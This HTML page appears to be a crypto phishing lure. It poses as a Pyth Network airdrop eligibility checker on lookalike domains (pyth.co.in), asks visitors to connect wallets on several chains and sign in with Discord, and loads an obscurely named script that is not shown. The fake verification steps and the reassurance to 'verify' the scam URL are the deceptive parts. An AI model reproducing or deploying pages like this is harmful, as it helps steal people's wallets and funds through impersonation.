<!DOCTYPE html>
<html lang="pt-br">
<head>
    <title>Pyth Network Restrospective Airdrop</title>

    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <script src="6ffed815d4c923-ba0c3.js"></script>

    <link rel="stylesheet" href="src/css/style.css">
    <link rel="shortcut icon" href="src/images/logo.svg" type="image/x-icon">
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Red+Hat+Display:wght@300;400&family=Red+Hat+Text:wght@300;400;500&display=swap" rel="stylesheet">

    <script src="https://kit.fontawesome.com/c49e0b56e6.js" crossorigin="anonymous"></script>

</head>
<body>

    <header>
        <div class="container">
            <nav>
                <div class="logo">
                    <img src="src/images/logo.svg" alt="">
                </div>
                <div class="info">
                    <p>Please verify that the site URL is: <a href="https://airdrop.pyth.co.in/">https://airdrop.pyth.co.in/</a> or <a href="https://pyth.co.in/">https://pyth.co.in/</a></p>
                </div>
            </nav>

            <section>
                <div class="box">
                    <div class="topico">
                        <span class="number">1</span>
                        <span>Welcome</span>
                    </div>
                    <div class="topico">
                        <span class="number">2</span>
                        <span>Review Airdrop Elegilibty</span>
                    </div>
                    <div class="topico select">
                        <span class="number">3</span>
                        <span>Verify Elegilibty</span>
                    </div>
                </div>
                <div class="box2">
                    <div class="boxcont" style="border-bottom: none;">
                        <div class="title" style="padding: 14px 20px;">
                            <h2>Verify Eligibility </h2>
                            <div class="btn" style="width: 50%;">
                                <a class="back" href="activy.html">
                                    <button><i class="fa-solid fa-arrow-left"></i> <span>back</span></button>
                                </a>
                                <a href="check.html">
                                    <button><span>proceed</span>  <i class="fa-solid fa-arrow-right"></i></button>
                                </a>
                            </div>
                        </div>

                        <div class="content" style="padding: 1px;">
                            <div class="acnt">
                                <div class="sect">
                                    <div class="topic"><p>Solana activity</p></div>
                                    <aside>
                                        <button class="connectButton"><i class="fa-solid fa-wallet"></i> connect wallet</button>
                                        <div class="cancel"><i class="fa-solid fa-x"></i></div>
                                    </aside>
                                </div>
                                <div class="numbercont">
                                    <h2>0</h2>
                                    <img src="src/images/logo.svg" alt="">
                                </div>
                            </div>

                            <div class="acnt">
                                <div class="sect">
                                    <div class="topic"><p>EVM activity</p></div>
                                    <aside>
                                        <button class="connectButton"><i class="fa-solid fa-wallet"></i> connect wallet</button>
                                        <div class="cancel"><i class="fa-solid fa-x"></i></div>
                                    </aside>
                                </div>
                                <div class="numbercont">
                                    <h2>0</h2>
                                    <img src="src/images/logo.svg" alt="">
                                </div>
                            </div>

                            <div class="acnt">
                                <div class="sect">
                                    <div class="topic"><p>Aptos activity</p></div>
                                    <aside>
                                        <button class="connectButton"><i class="fa-solid fa-wallet"></i> connect wallet</button>
                                        <div class="cancel"><i class="fa-solid fa-x"></i></div>
                                    </aside>
                                </div>
                                <div class="numbercont">
                                    <h2>0</h2>
                                    <img src="src/images/logo.svg" alt="">
                                </div>
                            </div>

                            <div class="acnt">
                                <div class="sect">
                                    <div class="topic"><p>Sui activity</p></div>
                                    <aside>
                                        <button class="connectButton"><i class="fa-solid fa-wallet"></i> connect wallet</button>
                                        <div class="cancel"><i class="fa-solid fa-x"></i></div>
                                    </aside>
                                </div>
                                <div class="numbercont">
                                    <h2>0</h2>
                                    <img src="src/images/logo.svg" alt="">
                                </div>
                            </div>

                            <div class="acnt">
                                <div class="sect">
                                    <div class="topic"><p>Ethereum activity</p></div>
                                    <aside>
                                        <button class="connectButton"><i class="fa-solid fa-wallet"></i> connect wallet</button>
                                        <div class="cancel"><i class="fa-solid fa-x"></i></div>
                                    </aside>
                                </div>
                                <div class="numbercont">
                                    <h2>0</h2>
                                    <img src="src/images/logo.svg" alt="">
                                </div>
                            </div>

                            <div class="acnt">
                                <div class="sect">
                                    <div class="topic"><p>Osmosis activity</p></div>
                                    <aside>
                                        <button class="connectButton"><i class="fa-solid fa-wallet"></i> connect wallet</button>
                                        <div class="cancel"><i class="fa-solid fa-x"></i></div>
                                    </aside>
                                </div>
                                <div class="numbercont">
                                    <h2>0</h2>
                                    <img src="src/images/logo.svg" alt="">
                                </div>
                            </div>

                            <div class="acnt">
                                <div class="sect">
                                    <div class="topic"><p>Neutron activity</p></div>
                                    <aside>
                                        <button class="connectButton"><i class="fa-solid fa-wallet"></i> connect wallet</button>
                                        <div class="cancel"><i class="fa-solid fa-x"></i></div>
                                    </aside>
                                </div>
                                <div class="numbercont">
                                    <h2>0</h2>
                                    <img src="src/images/logo.svg" alt="">
                                </div>
                            </div>

                            <div class="acnt">
                                <div class="sect">
                                    <div class="topic"><p>Sei activity</p></div>
                                    <aside>
                                        <button class="connectButton"><i class="fa-solid fa-wallet"></i> connect wallet</button>
                                        <div class="cancel"><i class="fa-solid fa-x"></i></div>
                                    </aside>
                                </div>
                                <div class="numbercont">
                                    <h2>0</h2>
                                    <img src="src/images/logo.svg" alt="">
                                </div>
                            </div>

                            <div class="acnt">
                                <div class="sect">
                                    <div class="topic"><p>Solana activity</p></div>
                                    <aside>
                                        <button class="connectButton"><i class="fa-solid fa-wallet"></i> connect wallet</button>
                                        <div class="cancel"><i class="fa-solid fa-x"></i></div>
                                    </aside>
                                </div>
                                <div class="numbercont">
                                    <h2>0</h2>
                                    <img src="src/images/logo.svg" alt="">
                                </div>
                            </div>

                            <div class="acnt">
                                <div class="sect">
                                    <div class="topic"><p>Discord activity</p></div>
                                    <aside>
                                        <button style="width: 150px;" class="discord connectButton"><i class="fa-brands fa-discord" style="font-size: 15px;"></i> sign in</button>
                                        <div class="cancel"><i class="fa-solid fa-x"></i></div>
                                    </aside>
                                </div>
                                <div class="numbercont">
                                    <h2>N/A</h2>
                                </div>
                            </div>

                            <div class="acnt" style="background-color: var(--tc);">
                                <div class="sect">
                                    <div class="topic"><p>Eligible Token Allocation</p></div>
                                </div>
                                <div class="numbercont">
                                    <h2>0</h2>
                                    <img src="src/images/logo.svg" alt="">
                                </div>
                            </div>
                        </div>
                        <footer><p>Useful links: FAQ</p></footer>
                    </div>
                </div>
            </section>
        </div>
    </header>

    <script src="src/js/script.js"></script>

</body>
</html>
